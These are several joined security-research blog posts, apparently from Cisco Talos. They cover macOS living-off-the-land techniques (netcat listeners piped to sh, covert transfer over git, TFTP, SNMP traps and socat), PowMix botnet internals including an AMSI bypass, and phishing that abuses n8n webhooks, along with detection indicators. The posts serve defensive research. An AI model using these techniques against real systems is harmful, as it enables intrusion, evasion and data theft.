Figure 16. Mounting SMB shares via osascript.
This mounts the share to “/Volumes/share” without requiring the GUI configuration step. With the share mounted, any file copied into the mount directory appears on the victim immediately.
Netcat-based transfer
nc (netcat) is a well-known general-purpose networking utility that ships with macOS. It can be utilized to open arbitrary TCP and UDP connections, listen on ports, and pass data between them.
The simplest pattern involves piping commands directly into a netcat listener. On the target, a listener is established that pipes incoming data directly to sh:
Figure 17. Netcat listener established on victim machine.
From the attacking machine, a command is then echoed into nc targeting the victim's IP and port:
Figure 18. Command execution via Netcat (attacker side).Figure 19. Command execution via Netcat (victim side).
The attacker sends the curl google.com command over the wire, which is caught by the victim's listener and executed by sh. The resulting output confirms successful execution on the target.
Netcat can also facilitate file transfers through several different methods. An attacker could invoke a fetch to a remote system where a script or payload is hosted, or start a simple HTTP server on their own machine to perform ad hoc tool transfer.
Figure 20. Serving files via netcat (Attacker Terminal 1).Figure 21. Initiating file transfer via Netcat (Attacker Terminal 2).
Git-based transfer
git is a version control system ubiquitous in software development. Its prevalence on developer machines and reliance on SSH as a transport make git push a practical file transfer mechanism. The technique requires initializing a repository on the target and setting receive.denyCurrentBranch updateInstead. By default, git refuses pushes to a branch that is currently checked out on the remote. This setting overrides that behavior and updates the working tree on push, landing files on disk the moment the operation completes.
First, a receiving repository is initialized on the target over SSH:
Figure 22. Initializing a Git repository on the target.
On the attacker, a local repository is created with the payload, and the remote is pointed at the target:
Figure 23. Pushing payloads to the target via Git.
After the push, “script.sh” exists on the target at “~/repos/project/script.sh”. Additional file transfers only require adding new files, committing, and pushing again. Because git operates over SSH, the transfer is encrypted and uses the same authentication established for command execution.
TFTP (Standard and unprivileged)
TFTP (Trivial File Transfer Protocol) is a lightweight, unauthenticated file transfer protocol that operates over UDP. macOS includes both a TFTP server and client. The server is not active by default but can be started through launchd.
With root access on the target, the system's built-in TFTP plist activates the server in a single command:
Figure 24. Activating the native TFTP server.
This serves “/private/tftpboot” on the standard TFTP port (UDP 69). The TFTP system plist does not provide the -w flag to the tftpd process. Without it, the server only allows writes to files that already exist. A placeholder file must be created on the target for each file being transferred:
Figure 25. Creating a placeholder file for TFTP transfer.
From the attacker, the payload is pushed to the target:
Figure 26. Pushing payload to target via TFTP.
In a post-exploitation scenario without root access, tftpd can still be deployed by loading a user-created plist from “/tmp” on a non-standard port. This variant passes the tftpd -w flag, which allows write requests to create new files, removing the placeholder requirement.
Figure 27. Non-root TFTP server deployment.
SNMP trap-based transfer
SNMP (Simple Network Management Protocol) is used for monitoring and managing network devices. SNMP traps are unsolicited notifications sent from agents to a management station over UDP port 162. The trap payload can carry arbitrary string data under custom OIDs, which can be repurposed as a data transfer channel. macOS ships with the necessary net-snmp tools: snmptrap (“/usr/bin/snmptrap”) on the sender and snmptrapd (“/usr/sbin/snmptrapd”) on the receiver.
The approach works by Base64 encoding a file, splitting it into fixed-size chunks, and sending each chunk as an SNMP trap payload under a custom OID in the private enterprise space (“1[.]3[.]6[.]1[.]4[.]1[.]99999”). A trap handler on the receiving end reassembles the chunks and decodes the file. The protocol uses three message types: “FILENAME” signals the start of a transfer, “DATA” carries a Base64 chunk, and “END” triggers reassembly.
On the receiver, a trap handler processes incoming traps:
Figure 28. SNMP trap handler logic.
The snmptrapd daemon is then configured on the target to route all incoming traps to the handler and started in the foreground:
Figure 29. Configuring the snmptrapd daemon.
On the sender, a script handles the encoding, chunking, and transmission. Each chunk is sent as a separate SNMP trap with a short delay between sends to avoid overwhelming the receiver:
Figure 30. Script for SNMP chunking and transmission.
The sender initiates the transfer:
Figure 31. Initiating data transfer via SNMP traps.
The target receives the transfer:
Figure 32. Successful payload reassembly on target.
The matching MD5 hashes confirm the file was transferred and reassembled intact.
Socat file transfer
The socat shell established in the above "socat remote shell” section can also serve as a file transfer channel. Because the listener provides a fully interactive bash session, file contents can be written to the remote host by injecting a heredoc through the connection. This means socat alone handles both remote command execution and tool transfer without requiring any additional services or listeners.
With the socat listener running on the target, the attacker delivers a file by piping a heredoc-wrapped cat command through a socat connection:
Figure 33. File delivery via socat heredoc injection.
Detection and defensive considerations
Defending against LOTL techniques requires a shift from simple network alerts to granular process and metadata analysis.
Network indicators
Inbound TCP traffic on port 3031 (the “eppc” port) and unusual SNMP/TFTP traffic on internal LAN segments should be monitored for potential unauthorized activity.
Endpoint indicators (EVM)
Through mapping to the Open Cybersecurity Schema Framework (OCSF), an open-source effort to deliver a simplified and vendor-agnostic taxonomy for security telemetry, high-fidelity signatures for these behaviors were identified:
Suspiciouslineage: Process trees following the pattern launchd -> AppleEventsD -> Terminal -> sh/bash.
Metadatamonitoring: Frequent or unusual calls to mdls or writes to “com.apple.metadata:kMDItemFinderComment”.
Commandlineanomalies:base64 --decode commands originating from GUI applications or osascript executions containing “of machine "eppc://..."” arguments.
Native security controls and hardening recommendations
Several built-in macOS security mechanisms can be configured to mitigate the risks associated with native primitive abuse:
Transparency, Consent, and Control (TCC)restrictions: The "Automation" category within TCC is designed to regulate inter-application communication. By enforcing strict TCC policies via Mobile Device Management (MDM), unauthorized Apple Events between applications — such as a script attempting to control “Terminal.app” or “Finder” — can be blocked.
MDM Policy Enforcement: RAS and Remote Login (SSH) should be disabled by default across the fleet. These services can be managed and restricted using MDM configuration profiles (e.g., the “com.apple.RemoteAppleEvents”payload) to ensure they are only active on authorized administrative hosts.
Servicehardening: Unnecessary network-facing services, such as tftpd and snmpd, should be explicitly disabled. The removal of these launchd plists from “/System/Library/LaunchDaemons” (where permitted by System Integrity Protection) or the use of launchctl disable commands prevents their use as ad-hoc data transfer channels.
Applicationfirewalland Stealth Mode: The built-in macOS application firewall should be enabled and configured in "Stealth Mode." This configuration ensures the device does not respond to unsolicited ICMP or connection attempts on common ports, reducing the visibility of the endpoint during internal reconnaissance.
Conclusion
The research presented in this article underscores a fundamental reality of modern endpoint security. The same primitives designed for administrative convenience and system automation are often the most potent tools in an adversary's arsenal. By moving beyond traditional exploit-based attacks and instead LOTL, attackers can operate within the noise of legitimate system activity.
From the weaponization of the “eppc” protocol to the creative abuse of Spotlight metadata and SNMP traps, it is clear that the macOS attack surface is both vast and nuanced. These techniques demonstrate that even within a "walled garden" ecosystem, native pathways for movement and execution remain accessible to those who understand the underlying architecture.
For defenders, the primary takeaway is that visibility remains the most effective deterrent. By shifting focus from static file analysis to the monitoring of process lineage, inter-process communication, and metadata anomalies, these "bad Apples" can be identified and neutralized. As macOS continues its expansion into the enterprise core, the documentation and detection of these native techniques must remain a priority for the security community.
Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one Foxit Reader vulnerability, and six LibRaw file reader vulnerabilities.The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always pos
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets fromSnort.org, and our latest Vulnerability Advisories are always posted onTalos Intelligence’s website.
Foxit use-after-free vulnerability
Discovered by KPC of Cisco Talos.
Foxit Reader allows users to view, edit, and sign PDF documents, among other features. Foxit aims to be one of the most feature-rich PDF readers on the market, and contains many similar functions to that of Adobe Acrobat Reader.
TALOS-2026-2365 (CVE-2026-3779) is a use-after-free vulnerability in the way Foxit Reader handles an Array object. A specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.
LibRaw heap-based buffer overflow and integer overflow vulnerabilities
Discovered by Francesco Benvenuto of Cisco Talos.
LibRaw is a library and user interface for processing RAW file types and metadata created by digital cameras. Talos analysts found 6 vulnerabilities in LibRaw.
TALOS-2026-2330 (CVE-2026-20911), TALOS-2026-2331 (CVE-2026-21413), TALOS-2026-2358 (CVE-2026-20889), and TALOS-2026-2359 (CVE-2026-24660) are heap-based buffer overflow vulnerabilities in LibRaw, and TALOS-2026-2363 (CVE-2026-24450) and TALOS-2026-2364 (CVE-2026-20884) are integer overflow vulnerabilities. Specially crafted malicious files can lead to heap buffer overflow in all cases. An attacker can provide a malicious file to trigger these vulnerabilities.
Welcome to this week’s edition of the Threat Source newsletter. The first quarter of 2026 passed faster than a misconfigured firewall rule gets exploited — and the last few weeks have been firmly stamped with the "software supply chain compromise" label, with headlines surrounding incidents involving Trivy,Checkmark, LiteLLM, telnyx and axios. This edition stays focused on vulnerability statistics, although you can view Dave and Nick's Talos blogs for more information about these incidents. Know
Welcome to this week’s edition of the Threat Source newsletter.
The first quarter of 2026 passed faster than a misconfigured firewall rule gets exploited — and the last few weeks have been firmly stamped with the "software supply chain compromise" label, with headlines surrounding incidents involving Trivy,Checkmark, LiteLLM, telnyx and axios. This edition stays focused on vulnerability statistics, although you can view Dave and Nick's Talos blogs for more information about these incidents.
Known Exploited Vulnerabilities (KEVs) stayed roughly in line with 2025 numbers — no dramatic spike, but no room for relief either.
What does stand out? Networking gear accounted for 20% of KEV-related vulnerabilities, and that number is expected to climb as the year progresses. If the trend from 2025 holds, this won't be the high-water mark.
Patch management remains one of the industry's most persistent challenges, and I understand all the operational complexity that comes with it. That said, it still stings to come across CVEs with disclosure dates reaching back to 2009 — and roughly 25% of the CVEs we're tracking date to 2024 or earlier. Old vulnerabilities don't retire. They wait. It starts with visibility: Knowing what's actually running in your environment is the prerequisite for everything else.
Overall CVE counts increased in Q1, with March showing the sharpest climb. Whether that reflects improved disclosure pipelines, increased researcher activity, ora genuine uptick in vulnerability density, the trend line from 2025 hasn't flattened — if anything, it's still pointing up.
Using the keyword methodology described here, 121 CVEs with AI relevance were identified in Q1 — more than Q1 2025, though consistent with what adoption trends would predict. As AI components become more deeply embedded across the software stack, this number will keep climbing.
Given the recent developments with models like the Mythos preview and the industry teaming up in initiatives like Project Glasswing, I'm curious how the trajectory will change moving forward. If you haven't read about it:
“During our testing, we found that Mythos Preview is capable of identifying and then exploiting zero-day vulnerabilities in every major operating system and every major web browser when directed by a user to do so.” -Anthropic Frontier Red Team
That's a substantial capability jump in agentic coding and reasoning, which eventually needs to be implemented early in the development lifecycle. And as Anthony points out, those capabilities will become available to adversaries. Read Cisco's guidance on defending in the age of AI-enabled attacks for more.
Will we see fewer CVEs or even more negative times-to-exploit (TTEs)?
It's on us. Defenders need to get ahead of the adversaries, and at the same time, we need to pay attention to (sometimes decade-old) vulnerabilities.
The one big thing
Cisco Talos has identifieda significant increase in the abuse of n8n, an AI workflow automation platform, to facilitate malicious campaigns including malware delivery and device fingerprinting. Attackers are weaponizing the platform’s URL-exposed webhooks to create phishing lures that bypass traditional security filters by leveraging trusted, legitimate infrastructure. By masking malicious payloads as standard data streams, these campaigns effectively turn productivity tools into delivery vehicles for remote access trojans and other cyber threats.
Why do I care?
The abuse of legitimate automation platforms exploits the inherent trust organizations place in these tools, which often neutralizes traditional perimeter-based security defenses. Because these platforms are designed for flexibility and seamless integration, they allow attackers to dynamically tailor payloads and evade detection through standard reputation-based filtering.
So now what?
Move beyond static domain blocking and implement behavioral detection that alerts on anomalous traffic patterns directed toward automation platforms. Restrict endpoint communication with these services to only those explicitly authorized by the organization’s established internal workflows. Finally, utilize AI-driven email security solutions to analyze the semantic intent of incoming messages and proactively share indicators of compromise, such as specific webhook structures, with threat intelligence communities.
Top security headlines of the week
Adobepatchesactivelyexploitedzero-daythatlingered formonths Adobe patched an arbitrary code execution vulnerability in the latest versions of its Acrobat and Reader for Windows and macOS, nearly four months after an attacker first appeared to have begun exploiting it. (Dark Reading)
Fake Claude website distributesPlugXRAT A threat actor created a site that hosts a download link pointing to a ZIP archive allegedly containing a pro version of the LLM. (SecurityWeek)
Sweden blames Russian hackers for attempting “destructive”cyber attackon thermal plant Sweden’s minister of civil defense said during a press conference on Wednesday that the attempted attack happened in early 2025 and attributed the incident to hackers with “connections to Russian intelligence and security services.” (TechCrunch)
FBI and Indonesian police dismantle W3LL phishing network behind $20M fraud attempts The W3LL phishing kit, advertised for a fee of about $500, allowed criminals to mimic legitimate login pages to deceive victims into handing over their credentials, allowing the attackers to seize control of their accounts. (The Hacker News)
Google API keys in Android apps expose Gemini endpoints to unauthorized access Armed with the key, an attacker could access private files and cached content, make arbitrary Gemini API calls, exhaust API quotas and disrupt legitimate services, and access any data on Gemini’s file storage. (SecurityWeek)
Can’t get enough Talos?
More than pretty pictures: Wendy Bishop on visual storytelling in tech From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy talks about the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.
PowMix botnet targets Czech workforce Cisco Talos discovered an ongoing malicious campaign affecting Czech workers with a previously undocumented botnet we call “PowMix.” It employs random beaconing intervals to evade the network signature detections.
APTs: Differentobjectives, similar access paths Across the Talos 2025 Year in Review, state-sponsored threat activity from China, Russia, North Korea, and Iran all had varying motivations, such as espionage, disruption, financial gain, and geopolitical influence.
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.” PowMix employs randomized command-and-control (C2) beaconing intervals, rather than persistent connection to the C2 server, to evade the network signature detections. PowMix embeds the encrypted heartbeat data along with unique identifiers of the victim machine into the C2 URL paths, mimicking leg
Cisco Talos discovered an ongoing malicious campaign, operating since at least December 2025, affecting a broader workforce in the Czech Republic with a previously undocumented botnet we call “PowMix.”
PowMix employs randomized command-and-control (C2) beaconing intervals, rather than persistent connection to the C2 server, to evade the network signature detections.
PowMix embeds the encrypted heartbeat data along with unique identifiers of the victim machine into the C2 URL paths, mimicking legitimate REST API URLs.
PowMix has the capability to remotely update the new C2 domain to the botnet configuration file dynamically.
Talos observed a few tactical similarities of the current campaign with the ZipLine campaign, including the payload delivery mechanism and the misuse of the legitimate cloud platform Heroku for C2 operations.
Victimology
Talos observed that an attacker targeted Czech organizations across various levels, based on the contents of the lure documents used by the attacker in the current campaign.
Impersonating the legitimate EDEKA brand and authentic regulatory frameworks such as the Czech Data Protection Act, the attacker deploys decoy documents with compliance-themed lures, potentially aimed at compromising victims from human resources (HR), legal, and recruitment agencies. In the lure documents, the attacker also used compensation data, as well as the legitimate legislative references, to enhance the authenticity of these decoy documents and to entice the job aspirants across diverse sectors like IT, finance, and logistics.
Figures 1 (left) and 2 (right). First pages of two decoy documents.
TTPs overlaps with the ZipLine campaign
Talos observed a few tactical similarities employed in the current campaign with that of the ZipLine campaign, reported by researchers from Check Point in August 2025.
In the current campaign, the PowMix botnet payload is delivered via an LNK triggered PowerShell loader that extracts it from a ZIP archive data blob, bypasses AMSI, and executes the decrypted script directly in memory. This campaign shares tactical overlaps with the older ZipLine campaign (which deployed the MixShell malware), including identical ZIP-based payload concealment, Windows-scheduled task persistence, CRC32-based BOT ID generation, and the abuse of “herokuapp.com” for command-and-control (C2) infrastructure. Although there are overlaps in the tactics, the attacker’s final payload was unobserved, and the intent remains unknown in this campaign.
Attack summary
Figure 3. Attack summary flow chart.
The attack begins when a victim runs the Windows shortcut file contained within the received malicious ZIP file, potentially through a phishing email. This shortcut file triggers the execution of an embedded PowerShell loader script, which initially creates a copy of the ZIP file along with its contents in the victim's “ProgramData” folder. Subsequently, it loads the malicious ZIP file, extracts, and executes the embedded PowMix botnet payload directly in the victim's machine memory and starts to communicate with the botnet C2.
PowerShell loader executes PowMix in memory
The first stage PowerShell script functions as a loader, and its execution routine is designed to bypass security controls and deliver a secondary payload. It begins by defining several obfuscated variables, including file name of the malicious ZIP file that was likely received via a phishing email. Then, the script dynamically constructs paths to the folders such as “ProgramData” and the user’s “Downloads” folder to locate this ZIP file. Once the ZIP file is found, it extracts the contents to the “ProgramData”folder, effectively staging the environment for the next phase of the attack.
Figure 4. Excerpt of the deobfuscated PowerShell Loader main function.
To evade detection, the script employs an AMSI (Antimalware Scan Interface) bypass technique. It uses a reflection technique to browse the loaded assemblies in the current process, specifically searching for the AmsiUtils class. Once located, it identifies the amsiInitFailed field and manually sets its value to true. This action deceives the Windows security subsystem into thinking that AMSI has not initialized, which disables real-time scanning of subsequent commands, enabling the script to run malicious code in memory without being detected by Windows Defender or other endpoint detection and response (EDR) solutions.
Figure 5. Excerpt of the deobfuscated PowerShell Loader AMSI bypass function.
The script parses the malicious ZIP file to locate a specific marker that is hardcoded, such as zAswKoK. This marker is treated as a delimiter, enabling the extraction of a hidden, encoded command that is embedded within the ZIP file data blob.
Figure 6. Malicious ZIP file data blob embedded with an obfuscated PowMix botnet.
Throughout this process, the script performs a series of string replacements, which include the removal of # symbols and the mapping of placeholders, such as {cdm}, to their corresponding specific file paths, reconstructing a functional secondary PowerShell script payload. Then it executes the secondary payload script in the victim machine memory using the Invoke-Expression (IEX) PowerShell command.
Figure 7. PowerShell loader excerpt with instructions to extract payload and execute.
PowMix botnet
Talos discovered that the secondary payload PowerShell script, which we call “PowMix,” is a previously unreported botnet designed for remote access, reconnaissance, and remote code execution.
The main execution of the script begins with an environment check to ensure it is running within a specific loader context at the placeholder {cdm}, which is the path of the Windows shortcut in the ProgramData folder, before immediately attempting to conceal its presence. It invokes a function that utilizes the Win32ShowWindowAsync function of “user32.dll” to hide the current PowerShell console window.
Figure 8. PowMix excerpt to hide the PowerShell console window.
Then it decrypts the C2 domain and a configuration file using a custom XOR-based routine with a hardcoded key. It retrieves the machine's product ID by querying the HKLM: SOFTWARE\Microsoft\Windows NT\CurrentVersion registry key for the Windows ProductID. PowMix processes the victim machine’s ProductID and the decrypted configuration data through a CRC32-style checksum function to generate a unique Bot ID and a corresponding Windows schedule task name, which it subsequently uses to establish persistence.
Some of the hardcoded XOR key strings found in this campaign are:
HpSWSb
qDQyxQE
bKUxmhyAe
HymzqLse
KsEYwmgSF
ujCPOEPU
Figure 9. PowMix excerpts with the main function and the function that implements the CRC32 type checksum algorithm.
Instead of using obvious task names, PowMix names the scheduled task by concatenating the Bot ID and Configuration file hash, resulting in names that appear as random hexadecimal strings (such as "289c2e236761”). The task configuration specifies a daily trigger set to execute at 11:00 a.m., and the execution action is configured to launch the benign Windows Explorer binary with the malicious Windows Shortcut file path as an argument. Windows Explorer's file association handling then automatically launches the malicious shortcut file to execute the PowerShell loader script.
Figure 10. Windows scheduled task created by PowMix.
Before attempting to establish persistence, PowMix performs several validation checks to ensure that another instance of the botnet is not running in the infected machine. It examines the process tree using Common Information Model (CIM) queries to identify its parent processes. If the PowMix is not running under either “svchost.exe” or “powershell.exe”, and if certain environmental variables are not set, it attempts to restart itself in the privileged context.
Figure 11. PowMix excerpts with the instructions to establish persistence.
The mutex implementation in the botnet prevents multiple instances from running at the same time. It creates a mutex with the name “Global\[BotID]”. The “Global” prefix makes the mutex visible across all user sessions, stopping separate instances from running in different user sessions.
Figure 12. PowMix excerpts with Mutex creation commands.
PowMix avoids persistent connections to the C2 server. Instead, it implements a jitter via Get-Random PowerShell command to vary the beaconing intervals initially between 0 and 261 seconds, and subsequently between 1,075 and 1,450 seconds. This technique attempts to prevent detection of C2 traffic through predictable network signatures.
Each request from PowMix to C2 is created by concatenating the base C2 domain with the Bot ID, configuration file hash, an encrypted heartbeat, a hexadecimal Unix timestamp, and a random hexadecimal suffix. The standard heartbeat string “[]0” is encrypted using a custom XOR routine using the Bot ID as the key and is then converted to a hex string. The inclusion of a random length hexadecimal suffix further ensures that every URL is unique.
The attacker mimics the REST API calls URLs by embedding these data directly into the URL path, instead of using a URL query string or a POST request for communicating with the C2 server.
Figure 13. C2 URL format.
PowMix establishes a Chrome User-Agent and configures the Accept-Language (en-US) and Accept-Encoding (gzip, deflate, br) headers. It utilizes the GetSystemWebProxy API along with DefaultCredentials to dynamically adopt the host machine’s network proxy settings and automatically authenticates using the logged-in user's active session tokens, thereby disguising the C2 traffic as legitimate web browser traffic within the victim’s environment.
Figure 14. PowMix excerpts with C2 loop instructions. Figure 15. PowMix excerpts of download function with hardcoded HTTP headers.
The PowMix command processing logic is executed upon receiving the response from the C2 with a period delimiter. It extracts the second segment and decrypts it using the unique Bot ID as the XOR key. The resulting decrypted response is then evaluated through a conditional parser that distinguishes between the command operations hardcoded in the botnet and arbitrary code execution, allowing the attacker to remotely control the victim machine.
The remote management commands that the botnet receives from the C2 are identified by a leading hash symbol (#). We found that the PowMix botnet facilitates the commands described below:
#KILL - The KILL command initiates a self-deletion routine, utilizing the Unregister-ScheduledTask PowerShell command with the parameter Confirm: $false to silently remove persistence, followed by Remove-Item -Recurse–Force command to wipe the malware’s directory in the victim machine.
#HOST - The HOST command enables the C2 infrastructure migration by remotely updating a new C2 URL to a configuration file. By receiving the HOST command, PowMix will encrypt the new domain that it receives using the hardcoded XOR key and save it to a local configuration file via Set-Content PowerShell command. During the next initialization of the botnet through the task scheduler execution, it prioritizes the local configuration file data with the encrypted new C2 domain over hardcoded defaults, providing a robust mechanism for evading domain blacklisting.
For non #-prefixed responses from the C2, the command processing routine of PowMix transitions into an arbitrary execution mode. It bypasses static detection of the Invoke-Expression (IEX) PowerShell command by dynamically reconstructing the command string from the $VerbosePreference variable and executes the decrypted payload while redirecting the output to Out-Null, ensuring erasing the execution traces.
Figure 16. PowMix excerpts with the instructions facilitating the C2 commands.
Coverage
The following ClamAV signature detects and blocks this threat:
Lnk.Trojan.PowMix-10059735-0
Txt.Trojan.PowMix-10059742-0
Txt.Trojan.PowMix-10059778-0
Win.Trojan.PowMix-10059728-0
The following Snort Rules (SIDs) detect and block this threat:
Snort2 and Snort3: 66118
Indicators of compromise (IOCs)
The IOCs for this threat are also available at our GitHub repository here.
In this episode of Humans of Talos, Amy sits down with Wendy Bishop, Head of Creative, to explore the vital role of design in the world of cybersecurity. From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy shares the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.Whether you're a creative professional looking to break into the cybersecurity industry or simply curious about the people b
In this episode of Humans of Talos, Amy sits down with Wendy Bishop, Head of Creative, to explore the vital role of design in the world of cybersecurity. From her early beginnings in web design and journalism to leading the creative vision for Talos, Wendy shares the unique challenges and rewards of bridging the gap between artistic expression and highly technical research.
Whether you're a creative professional looking to break into the cybersecurity industry or simply curious about the people behind our security intelligence, this conversation offers a fascinating look at the artistic side of Talos' mission to keep the digital world safe.
Amy Ciminnisi: Wendy, welcome! We haven’t had anyone from creative here yet. Can you talk to me a little bit about what drew you into creative work and how your career evolved into what it is now at Talos?
Wendy Bishop: I never in my entire life thought I would do anything besides something creative. It’s the only thing I’ve ever known. I have so many memories in my childhood of just being locked in my moody teenage bedroom. In high school, I started doing web design courses, and I think that’s when I really started being interested in a graphic design path. I learned Photoshop and basic HTML/CSS stuff as a side hobby. I moderated a message board for my favorite pop-punk band in high school. When it came time to go to college, there was nothing I wanted to do otherwise besides design. I found myself at Ohio University— that’s where I’m from, Ohio — in the School of Visual Communication.
I went off to a job working in newspapers. I actually never thought I would, but it was the job I found after college, and I designed news pages. It sounds funny now; it was already dying then, probably not the best long career path. But I think my background in journalism and communication-driven design is really what made me a great fit for the kind of design work we do here at Talos. We work with complicated materials, and a lot of the creative work we do is comms-driven. Our blog in some ways functions as a news outlet, so visual storytelling is a lot of my job. But of course, we have a lot of regular, branding-based design work now that comes out of my team.
AC: We just had a really big report come out that has occupied our minds for months, especially over here in design. Can you talk a little bit about the 2025 Year in Review and share what that process is like?
WB: When it starts to take shape, I look over that draft with the team and we talk about each graphic. I say, "That one might be better if we did this," or "This is missing that piece for when it goes into production." I really start to wrap my mind around the various assets and how we would go about taking what is essentially an Excel graphic or something created in PowerPoint and making it into a much more polished and designed presentation.
We get a sneak peek, and then one day it lands on your desk, Amy. From there, my designers and I put it together. It’s a lot about putting that puzzle together, thinking about what makes sense on each page, making sure the content flow is clean and linear, and the adjacencies of the graphics are in the right place. I come to you and say, "Amy, I need a headline," or "Does this make sense?" We come up with a look and feel and theme for the whole report every year that’s greater than just the layout of the document. That gets extended to all the other companion pieces — our videos, social graphics, and any continuing campaign pieces.
Want to see more? Watch the full interview, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos.
Cisco Talos research has uncovered agentic AI workflow automation platform abuse in emails. Recently, we identified an increase in the number of emails that abuse n8n, one of these platforms, from as early as October 2025 through March 2026. In this blog, Talos provides concrete examples of how threat actors are weaponizing legitimate automation platforms to facilitate sophisticated phishing campaigns, ranging from delivering malware to fingerprinting devices. By leveraging trusted infrastructu
Cisco Talos research has uncovered agentic AI workflow automation platform abuse in emails. Recently, we identified an increase in the number of emails that abuse n8n, one of these platforms, from as early as October 2025 through March 2026.
In this blog, Talos provides concrete examples of how threat actors are weaponizing legitimate automation platforms to facilitate sophisticated phishing campaigns, ranging from delivering malware to fingerprinting devices.
By leveraging trusted infrastructure, these attackers bypass traditional security filters, turning productivity tools into delivery vehicles for persistent remote access.
AI workflow automation platforms such as Zapier and n8n are primarily used to connect different software applications (e.g., Slack, Google Sheets, or Gmail) with AI models (e.g., OpenAI’s GPT-4 or Anthropic’s Claude). These platforms have been applied to different application domains, including cybersecurity over the past few months, especially with the progress that has been made in new avenues like large language models (LLMs) and agentic AI systems. However, much like other legitimate tools, AI workflow automation platforms can be weaponized to orchestrate malicious activities, like delivering malware by sending automated emails.
This blog describes how n8n, one of the most popular AI workflow automation platforms, has been abused to deliver malware and fingerprint devices by sending automated emails.
What is n8n?
N8n is a workflow automation platform that connects web applications and services (including Slack, GitHub, Google Sheets, and others with HTTP-based APIs) and builds automated workflows. A community-licensed version of the platform can be self-hosted by organizations. The commercial service, hosted at n8n.io, includes AI-driven features that can create agents capable of using web-based APIs to pull data from documents and other data sources.
Users can register for an n8n developer account at no initial charge. Doing so creates a subdomain on “tti.app.n8n[.]cloud” from which the user’s applications can be accessed. This is similar to many web-based AI-aided development tools, and one that malicious actors have harnessed elsewhere in the past; earlier this year, Talos observed another AI-oriented web application service, Softr.io, being used for the creation of phishing pages used in a series of targeted attacks.
How n8n’s webhooks work
Talos' investigation found that a primary point of abuse in n8n’s AI workflow automation platform is its URL-exposed webhooks. A webhook, often referred to as a “reverse API,” allows one application to provide real-time information to another. These URLs register an application as a “listener” to receive data, which can include programmatically pulled HTML content. An example of an n8n webhook URL is shown in Figure 1.
Figure 1. Anatomy of an example n8n webhook URL.
When the URL receives a request, the subsequent workflow steps are triggered, returning results as an HTTP data stream to the requesting application. If the URL is accessed via email, the recipient’s browser acts as the receiving application, processing the output as a webpage.
Talos has observed a significant rise in emails containing n8n webhook URLs over the past year. For example, the volume of these emails in March 2026 was approximately 686% higher than in January 2025. This increase is driven, in part, by several instances of platform abuse, including malware delivery and device fingerprinting, as we will discuss in the next sections.
Figure 2. The prevalence of n8n webhook URLs in emails over the past few months.
Abusing n8n for malware delivery
Because webhooks mask the source of the data they deliver, they can be used to serve payloads from untrusted sources while making them appear to originate from a trusted domain. Furthermore, since webhooks can dynamically serve different data streams based on triggering events — such as request header information — a phishing operator can tailor payloads based on the user-agent header.
Figure 3. Example of a malicious email that delivers malware to the victim’s device by abusing the n8n platform.
Talos observed a phishing campaign (shown in Figure 3) that used an n8n-hosted webhook link in emails that purported to be a shared Microsoft OneDrive folder. When clicked, the link opened a webpage in the targeted user’s browser containing a CAPTCHA.
Figure 4. HTML document delivered by the webhook presenting a CAPTCHA.
Once the CAPTCHA is completed, a download button appears, triggering a progress bar as the payload is downloaded from an external host. Because the entire process is encapsulated within the JavaScript of the HTML document, the download appears to the browser to have come from the n8n domain.
Figure 5. HTML and JavaScript payload of the webhook downloads an executable file from a malicious URL.
In this case, the payload was an .exe file named “DownloadedOneDriveDocument.exe” that posed as a self-extracting archive. When opened, it installed a modified version of the Datto Remote Monitoring and Management (RMM) tool and executed a chain of PowerShell commands.
Figure 6. Downloaded executable and the document it deploys (an installer for an RMM tool).
The PowerShell commands generated by the malicious executable extract and configure the Datto RMM tool, configure it as a scheduled task, and then launch it, establishing a connection to a relay on Datto's "centrastage[.]net" domain before deleting themselves and the rest of the payload.
Figure 7. The webhook-delivered “DownloadedOneDriveDocument.exe” malware attack chain.
Talos observed a similar campaign that also utilized an n8n webhook to deliver a different payload. Like the previous instance, it featured a self-contained phishing page delivered as a data stream from the webhook, protected with a CAPTCHA for human verification.
Figure 8. Second CAPTCHA variant presented by n8n webhook.
This CAPTCHA code was significantly simpler than the first case. The payload delivered upon solving the CAPTCHA was a maliciously modified Microsoft Windows Installer (MSI) file named “OneDrive_Document_Reader_pHFNwtka_installer.msi”. Protected by the Armadillo anti-analysis packer, the payload deployed a different backdoor: the ITarian Endpoint Management RMM tool. When executed by “msiexec.exe”, the file installs a modified version of the ITarian Endpoint RMM, which acts as a backdoor while running Python modules to exfiltrate information from the target’s system. During this process, a fake installer GUI displays a progress bar; once finished, the bar resets to 0% and the application exits, creating the illusion of a failed installation.
Abusing n8n for fingerprinting
Talos observed another common abuse case: device fingerprinting. This is achieved by embedding an invisible image (or tracking pixel) within an email. For example, when the <img> HTML tag is used, it tells the email client (e.g., Outlook or Gmail) to fetch an image from a specific URL. Figure 9 shows an example spam email in the Spanish language that leverages this technique.
Figure 9. Email example where n8n is abused to fingerprint the recipient’s device.
When the email client attempts to load the image, it automatically sends an HTTP GET request to the specified address, which is an n8n webhook URL. These URLs include tracking parameters (such as the victim’s email address), allowing the server to identify exactly which user opened the email. Also, it is clear how this image is made invisible by using the “display” and “opacity” CSS properties.
Figure 10. HTML source snippet of the email in Figure 9.
The second example below uses the same technique to track email opens and fingerprint the recipient’s device. Here, the sender tries to get a hold of recipient by introducing a new gift card feature.
Figure 11. Email example where n8n is abused to fingerprint the recipient’s device.Figure 12. HTML source snippet of email in Figure 11.
Conclusion
The same workflows designed to save developers hours of manual labor are now being repurposed to automate the delivery of malware and fingerprinting devices due to their flexibility, ease of integration, and seamless automation. As we continue to leverage the power of low-code automation, it’s the responsibility of security teams to ensure these platforms and tools remain assets rather than liabilities.
Protection
